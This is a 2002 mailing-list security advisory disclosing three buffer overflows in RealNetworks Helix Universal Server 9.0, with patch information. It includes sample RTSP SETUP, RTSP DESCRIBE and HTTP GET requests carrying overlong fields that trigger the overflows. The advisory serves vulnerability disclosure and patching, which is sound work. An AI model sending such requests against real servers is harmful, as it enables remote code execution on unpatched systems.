[NEWS] Multiple Buffer overruns RealNetworks Helix Universal Server
From: support@securiteam.com
Date: 12/25/02
- Previous message: support@securiteam.com: "[UNIX] zkfingerd Format String Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 25 Dec 2002 11:41:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
Multiple Buffer overruns RealNetworks Helix Universal Server
------------------------------------------------------------------------
SUMMARY
According to REAL, the Helix Universal Server is the only universal
platform with support for live and on-demand delivery of all major media
file formats, including Real Media, Windows Media, QuickTime, MPEG 4, MP3,
MPEG 2, and more. The Helix server is vulnerable to multiple buffer
overrun vulnerabilities. Previous versions were not tested but it is
assumed that they too may be vulnerable.
DETAILS
Vulnerable systems:
* RealNetworks Helix Universal Server 9.0 under Windows, FreeBSD, HP-UX,
AIX, Linux, Sun Solaris 2.7 & 2.8
The Helix server uses the RTSP protocol, which is based upon HTTP.
Vulnerability One:
By supplying an overly long character string within the transport field of
a SETUP RSTP request to a Helix server, which by default listens on TCP
port 554, an overflow will occur overwriting the saved return address on
the stack. On a windows box, the Helix server is installed by default as a
system service and so exploitation of this vulnerability would result in a
complete server compromise, with supplied code executing in the security
context of SYSTEM. The impact of these vulnerabilities on UNIX based
platforms was not tested, though they are vulnerable.
SETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0
CSeq: 302
Transport: AAAAAAAAA-->
Vulnerability Two:
By supplying a very long URL in the Describe field, again over port 554,
an attacker can overwrite the saved return address allowing the execution
of code
DESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0
CSeq: 2
Accept: application/sdp
Session: 4668-1
Bandwidth: 393216
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie: cbid=www.ngsconsulting.com
GUID: 00000000-0000-0000-0000-000000000000
Language: en-us
PlayerCookie: cbid
RegionData: myregion
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Vulnerability Three:
By making two HTTP requests (port 80) containing long URI's
simultaneously, (in making the first connection, it will appear to hang,
by keeping this session open and making another connection and supplying
the same request again ), will cause the saved return address to also be
overwritten, allowing an attacker to run arbitrary code of their choosing.
GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
User-Agent: RealPlayer G2
Expires: Mon, 18 May 1974 00:00:00 GMT
Pragma: no-cache
Accept: application/x-rtsp-tunnelled, */*
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie:
cbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihdi
X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt
Fix Information:
NGSSoftware alerted REALNetworks to theses issues on 8/11/2002,
30/11/2002, 12/11/2002 respectively. A patch has now been made available
from
<http://www.service.real.com/help/faq/security/bufferoverrun12192002.html>
http://www.service.real.com/help/faq/security/bufferoverrun12192002.html
ADDITIONAL INFORMATION
The information has been provided by <mailto:nisr@nextgenss.com>
NGSSoftware Insight Security Research.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[UNIX] ProFTPD Long Password Crash"
- Previous message: support@securiteam.com: "[UNIX] zkfingerd Format String Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
